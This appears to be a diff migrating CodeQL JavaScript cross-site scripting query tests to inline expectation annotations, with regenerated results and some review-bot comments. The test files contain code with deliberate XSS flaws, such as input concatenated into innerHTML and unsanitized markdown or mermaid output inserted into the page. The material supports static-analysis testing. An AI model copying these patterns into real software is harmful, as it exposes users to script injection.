main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:106:24:106:26 | svg | cross-site scripting | +| main.js:109:41:109:41 | x | main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:109:20:109:42 | mermaid ... id", x) | cross-site scripting | +| main.js:111:37:111:37 | x | main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | This markdown rendering which depends on $@ might later allow $@. 
| main.js:98:43:98:43 | x | library input | main.js:112:24:112:26 | svg | cross-site scripting | +| main.js:117:34:117:34 | s | main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:116:47:116:47 | s | library input | main.js:118:53:118:56 | html | cross-site scripting | +| typed.ts:2:29:2:29 | s | typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:1:39:1:39 | s | library input | typed.ts:3:31:3:34 | html | cross-site scripting | +| typed.ts:8:40:8:40 | s | typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:6:43:6:43 | s | library input | typed.ts:8:29:8:52 | " ... /span>" | cross-site scripting | +edges +| jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | provenance | | +| jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:37 | options | provenance | | +| jquery-plugin.js:12:31:12:37 | options | jquery-plugin.js:12:31:12:41 | options.foo | provenance | Config | +| lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | provenance | | +| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | provenance | | +| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:13:16:13:23 | settings | provenance | | +| lib2/index.ts:13:9:13:41 | name | lib2/index.ts:18:62:18:65 | name | provenance | | +| lib2/index.ts:13:16:13:23 | settings | lib2/index.ts:13:16:13:33 | settings.mySetting | provenance | Config | +| lib2/index.ts:13:16:13:33 | settings.mySetting | lib2/index.ts:13:16:13:36 | setting ... ting[i] | provenance | Config | +| lib2/index.ts:13:16:13:36 | setting ... ting[i] | lib2/index.ts:13:16:13:41 | setting ... i].name | provenance | Config | +| lib2/index.ts:13:16:13:41 | setting ... 
i].name | lib2/index.ts:13:9:13:41 | name | provenance | | +| lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | provenance | | +| lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | provenance | | +| main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | provenance | | +| main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | provenance | | +| main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | provenance | | +| main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | provenance | | +| main.js:56:28:56:34 | options | main.js:60:41:60:47 | options | provenance | | +| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | +| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | +| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | +| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | +| main.js:60:11:60:48 | settings | main.js:62:19:62:26 | settings | provenance | | +| main.js:60:22:60:48 | $.exten ... ptions) | main.js:60:11:60:48 | settings | provenance | | +| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | +| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | +| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | Config | +| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | +| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | +| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | Config | +| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | +| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... 
ptions) | provenance | Config | +| main.js:62:19:62:26 | settings | main.js:62:19:62:31 | settings.name | provenance | Config | +| main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | provenance | | +| main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | provenance | | +| main.js:89:21:89:21 | x | main.js:90:23:90:23 | x | provenance | | +| main.js:93:43:93:43 | x | main.js:94:31:94:31 | x | provenance | | +| main.js:94:31:94:31 | x | main.js:89:21:89:21 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | provenance | | +| main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | provenance | | +| main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | provenance | | +| typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | provenance | | +| typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | provenance | | nodes | jquery-plugin.js:11:27:11:31 | stuff | semmle.label | stuff | | jquery-plugin.js:11:34:11:40 | options | semmle.label | options | 
@@ -58,76 +130,4 @@ nodes | typed.ts:2:29:2:29 | s | semmle.label | s | | typed.ts:6:43:6:43 | s | semmle.label | s | | typed.ts:8:40:8:40 | s | semmle.label | s | -edges -| jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | provenance | | -| jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:37 | options | provenance | | -| jquery-plugin.js:12:31:12:37 | options | jquery-plugin.js:12:31:12:41 | options.foo | provenance | Config | -| lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | provenance | | -| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | provenance | | -| lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:13:16:13:23 | settings | provenance | | -| lib2/index.ts:13:9:13:41 | name | lib2/index.ts:18:62:18:65 | name | provenance | | -| lib2/index.ts:13:16:13:23 | settings | lib2/index.ts:13:16:13:33 | settings.mySetting | provenance | Config | -| lib2/index.ts:13:16:13:33 | settings.mySetting | lib2/index.ts:13:16:13:36 | setting ... ting[i] | provenance | Config | -| lib2/index.ts:13:16:13:36 | setting ... ting[i] | lib2/index.ts:13:16:13:41 | setting ... i].name | provenance | Config | -| lib2/index.ts:13:16:13:41 | setting ... 
i].name | lib2/index.ts:13:9:13:41 | name | provenance | | -| lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | provenance | | -| lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | provenance | | -| main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | provenance | | -| main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | provenance | | -| main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | provenance | | -| main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | provenance | | -| main.js:56:28:56:34 | options | main.js:60:41:60:47 | options | provenance | | -| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | -| main.js:57:11:59:5 | defaults | main.js:60:31:60:38 | defaults | provenance | | -| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | -| main.js:57:22:59:5 | {\\n ... "\\n } | main.js:57:11:59:5 | defaults | provenance | | -| main.js:60:11:60:48 | settings | main.js:62:19:62:26 | settings | provenance | | -| main.js:60:22:60:48 | $.exten ... ptions) | main.js:60:11:60:48 | settings | provenance | | -| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | -| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | -| main.js:60:31:60:38 | defaults | main.js:60:22:60:48 | $.exten ... ptions) | provenance | Config | -| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | -| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | | -| main.js:60:41:60:47 | options | main.js:57:22:59:5 | {\\n ... "\\n } | provenance | Config | -| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... ptions) | provenance | | -| main.js:60:41:60:47 | options | main.js:60:22:60:48 | $.exten ... 
ptions) | provenance | Config | -| main.js:62:19:62:26 | settings | main.js:62:19:62:31 | settings.name | provenance | Config | -| main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | provenance | | -| main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | provenance | | -| main.js:89:21:89:21 | x | main.js:90:23:90:23 | x | provenance | | -| main.js:93:43:93:43 | x | main.js:94:31:94:31 | x | provenance | | -| main.js:94:31:94:31 | x | main.js:89:21:89:21 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | provenance | | -| main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | provenance | | -| main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | provenance | | -| typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | provenance | | -| typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | provenance | | subpaths -#select -| jquery-plugin.js:12:31:12:41 | options.foo | jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:41 | options.foo | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:34:11:40 | options | library input | jquery-plugin.js:12:20:12:53 | " ... /span>" | cross-site scripting | -| jquery-plugin.js:14:31:14:35 | stuff | jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:27:11:31 | stuff | library input | jquery-plugin.js:14:20:14:47 | " ... /span>" | cross-site scripting | -| lib2/index.ts:2:27:2:27 | s | lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | This HTML construction which depends on $@ might later allow $@. 
| lib2/index.ts:1:28:1:28 | s | library input | lib2/index.ts:3:47:3:50 | html | cross-site scripting | -| lib2/index.ts:7:58:7:65 | settings | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:7:47:7:77 | " ... /span>" | cross-site scripting | -| lib2/index.ts:18:62:18:65 | name | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:18:62:18:65 | name | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:18:51:18:77 | " ... /span>" | cross-site scripting | -| lib2/src/MyNode.ts:2:29:2:29 | s | lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib2/src/MyNode.ts:1:28:1:28 | s | library input | lib2/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | -| lib/src/MyNode.ts:2:29:2:29 | s | lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib/src/MyNode.ts:1:28:1:28 | s | library input | lib/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | -| main.js:2:29:2:29 | s | main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | main.js:1:55:1:55 | s | library input | main.js:3:49:3:52 | html | cross-site scripting | -| main.js:7:49:7:49 | s | main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:6:49:6:49 | s | library input | main.js:8:48:8:66 | doc.documentElement | cross-site scripting | -| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. 
| main.js:11:60:11:60 | s | library input | main.js:16:21:16:35 | xml.cloneNode() | cross-site scripting | -| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:17:48:17:50 | tmp | cross-site scripting | -| main.js:22:34:22:34 | s | main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:21:47:21:47 | s | library input | main.js:23:53:23:56 | html | cross-site scripting | -| main.js:62:19:62:31 | settings.name | main.js:56:28:56:34 | options | main.js:62:19:62:31 | settings.name | This HTML construction which depends on $@ might later allow $@. | main.js:56:28:56:34 | options | library input | main.js:62:11:62:40 | "" + ... "" | cross-site scripting | -| main.js:67:63:67:69 | attrVal | main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | This HTML construction which depends on $@ might later allow $@. | main.js:66:35:66:41 | attrVal | library input | main.js:67:47:67:78 | "" | cross-site scripting | -| main.js:81:35:81:37 | val | main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | This HTML construction which depends on $@ might later allow $@. | main.js:79:34:79:36 | val | library input | main.js:81:24:81:49 | " ... /span>" | cross-site scripting | -| main.js:90:23:90:23 | x | main.js:93:43:93:43 | x | main.js:90:23:90:23 | x | This HTML construction which depends on $@ might later allow $@. | main.js:93:43:93:43 | x | library input | main.js:94:20:94:32 | createHTML(x) | cross-site scripting | -| main.js:99:28:99:28 | x | main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | This markdown rendering which depends on $@ might later allow $@. 
| main.js:98:43:98:43 | x | library input | main.js:100:24:100:26 | svg | cross-site scripting | -| main.js:103:43:103:43 | x | main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:103:20:103:44 | myMerma ... id", x) | cross-site scripting | -| main.js:105:26:105:26 | x | main.js:98:43:98:43 | x | main.js:105:26:105:26 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:106:24:106:26 | svg | cross-site scripting | -| main.js:109:41:109:41 | x | main.js:98:43:98:43 | x | main.js:109:41:109:41 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:109:20:109:42 | mermaid ... id", x) | cross-site scripting | -| main.js:111:37:111:37 | x | main.js:98:43:98:43 | x | main.js:111:37:111:37 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:112:24:112:26 | svg | cross-site scripting | -| main.js:117:34:117:34 | s | main.js:116:47:116:47 | s | main.js:117:34:117:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:116:47:116:47 | s | library input | main.js:118:53:118:56 | html | cross-site scripting | -| typed.ts:2:29:2:29 | s | typed.ts:1:39:1:39 | s | typed.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:1:39:1:39 | s | library input | typed.ts:3:31:3:34 | html | cross-site scripting | -| typed.ts:8:40:8:40 | s | typed.ts:6:43:6:43 | s | typed.ts:8:40:8:40 | s | This HTML construction which depends on $@ might later allow $@. | typed.ts:6:43:6:43 | s | library input | typed.ts:8:29:8:52 | " ... /span>" | cross-site scripting | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref index 0fbe0ed0ba1a..b8e264532e4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-079/UnsafeHtmlConstruction.ql \ No newline at end of file +query: Security/CWE-079/UnsafeHtmlConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index 6a133a747bdd..40f33d8edb3f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -5,11 +5,11 @@ factory(jQuery); } }(function ($) { - $("" + $.trim("foo") + ""); // OK + $("" + $.trim("foo") + ""); })); -$.fn.myPlugin = function (stuff, options) { - $("#foo").html("" + options.foo + ""); // NOT OK +$.fn.myPlugin = function (stuff, options) { // $ Source + $("#foo").html("" + options.foo + ""); // $ Alert - $("#foo").html("" + stuff + ""); // NOT OK + $("#foo").html("" + stuff + ""); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 91e81238605a..7e546c05d103 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts 
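Review bot: The single `// $ Source` on the `$.fn.myPlugin = function (stuff, options) {` line stands for two separate sources, since the regenerated `.expected` lists `stuff` (11:27) and `options` (11:34) as distinct origins for the alerts on lines 14 and 12. The inline marker does not say which parameter reaches which sink, so a reader has to go back to the `.expected` file to see it. A trailing note in the style already used elsewhere in this change would keep that visible: `// $ Source - stuff and options are both library inputs`.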
@@ -1,4 +1,4 @@ -export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK +export function trivialXss(s: string) { // $ Source + const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 4e5e4730547e..a69e6e5626d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,10 +1,10 @@ -export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is recognized as a main file. +export function trivialXss(s: string) { // $ Source + const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } -export function objectStuff(settings: any, i: number) { - document.querySelector("#html").innerHTML = "" + settings + ""; // NOT OK +export function objectStuff(settings: any, i: number) { // $ Source + document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; if (settings.mySetting && settings.mySetting.length !== 0) { @@ -15,7 +15,7 @@ export function objectStuff(settings: any, i: number) { name = ""; } - document.querySelector("#html").innerHTML = "" + name + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + name + ""; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index e28325ce0cf8..3c7ac0103431 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is not recognized as a main file. +export function trivialXss(s: string) { // $ Source + const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 01d376a2f8be..78da04582957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,15 +1,15 @@ -module.exports.xssThroughHTMLConstruction = function (s) { - const html = "" + s + "";// NOT OK +module.exports.xssThroughHTMLConstruction = function (s) { // $ Source + const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } -module.exports.xssThroughXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK +module.exports.xssThroughXMLParsing = function (s) { // $ Source + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } -module.exports.xssThroughMoreComplexXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK +module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; const tmp = document.createElement('span'); 
@@ -18,14 +18,14 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { } const markdown = require('markdown-it')({html: true}); -module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK +module.exports.xssThroughMarkdown = function (s) { // $ Source + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } const striptags = require('striptags'); module.exports.sanitizedHTML = function (s) { - const html = striptags("" + s + ""); // OK + const html = striptags("" + s + ""); document.querySelector("#sanitized").innerHTML = html; } @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // NOT OK + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ MISSING: Alert - needs localFieldStep } } 
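Review bot: The `// $ MISSING: Alert - needs localFieldStep` annotation in `doXss()` records a case the query does not report, but it names only the library mechanism and not the flow that is lost. The previous comment was a bare `NOT OK`, so this hunk does not show whether the gap is new with the test migration or already existed; the commit description should say which. A wording such as `// $ MISSING: Alert - flow through the field this.step is not tracked (needs localFieldStep)` would keep the gap readable for whoever triages it. The body of class `Foo` starts outside this hunk, so where `step` is assigned is assumed rather than visible.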
@@ -53,67 +53,67 @@ module.exports.createsClass = function (s) { return new Foo(s); } -$.fn.xssPlugin = function (options) { +$.fn.xssPlugin = function (options) { // $ Source const defaults = { name: "name" }; const settings = $.extend(defaults, options); return this.each(function () { - $("" + settings.name + "").appendTo(this); // NOT OK + $("" + settings.name + "").appendTo(this); // $ Alert }); } -module.exports.guards = function (attrVal) { - document.querySelector("#id").innerHTML = "\"""; // NOT OK - document.querySelector("#id").innerHTML = "\"""; // OK +module.exports.guards = function (attrVal) { // $ Source + document.querySelector("#id").innerHTML = "\"""; // $ Alert + document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; } } module.exports.intentionalTemplate = function (obj) { - const html = "" + obj.spanTemplate + ""; // OK + const html = "" + obj.spanTemplate + ""; document.querySelector("#template").innerHTML = html; } -module.exports.types = function (val) { +module.exports.types = function (val) { // $ Source if (typeof val === "string") { - $("#foo").html("" + val + ""); // NOT OK + $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } else if (typeof val === "boolean") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } } function createHTML(x) { - return "" + x + ""; // NOT OK + return "" + x + ""; // $ Alert } -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source $("#foo").html(createHTML(x)); } const myMermaid = require('mermaid'); -module.exports.usesCreateHTML = function (x) { - myMermaid.render("id", x, function (svg) { // NOT OK +module.exports.usesCreateHTML = function (x) { // $ Source + 
myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); - $("#foo").html(myMermaid.render("id", x)); // NOT OK + $("#foo").html(myMermaid.render("id", x)); // $ Alert - mermaid.render("id", x, function (svg) {// NOT OK + mermaid.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); - $("#foo").html(mermaid.render("id", x)); // NOT OK + $("#foo").html(mermaid.render("id", x)); // $ Alert - mermaid.mermaidAPI.render("id", x, function (svg) {// NOT OK + mermaid.mermaidAPI.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); } -module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK +module.exports.xssThroughMarkdown = function (s) { // $ Source + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index 0f04e92cdc04..1c50460050cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,11 +1,11 @@ -export function basicHtmlConstruction(s: string) { - const html = "" + s + ""; // NOT OK +export function basicHtmlConstruction(s: string) { // $ Source + const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } -export function insertIntoCreatedDocument(s: string) { +export function insertIntoCreatedDocument(s: string) { // $ Source const newDoc = document.implementation.createHTMLDocument(""); - newDoc.body.innerHTML = "" + s + ""; // OK - inserted into document disconnected from the main DOM. [INCONSISTENCY] + newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } export function id(s: string) { 
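Review bot: The `SPURIOUS: Alert` comment on `newDoc.body.innerHTML` in `insertIntoCreatedDocument` says the write is harmless because the document is disconnected, but it does not state the condition that makes this true. Markup parsed into a document from `createHTMLDocument` stays inert only while none of its nodes are moved into the live document, and this function happens never to do that. I would record that in the annotation, e.g. `// $ SPURIOUS: Alert - document is disconnected from the main DOM and no node is moved out of it.`, so that a later sanitizer for this pattern is not written more broadly than the test justifies.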
@@ -14,7 +14,7 @@ export function id(s: string) { export function notVulnerable() { const s = id("x"); - const html = "" + s + ""; // OK + const html = "" + s + ""; document.body.innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql deleted file mode 100644 index d7e452b2a8c1..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeJQueryPluginQuery as UnsafeJqueryPlugin diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected index f246b00d7878..236f3b387fa5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected 
@@ -1,3 +1,27 @@ +#select +| unsafe-jquery-plugin.js:3:5:3:11 | options | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:3:5:3:11 | options | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:5:5:5:18 | options.target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:5:5:5:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:22:6:22:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:22:6:22:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:30:6:30:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:30:6:30:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:36:6:36:11 | target | 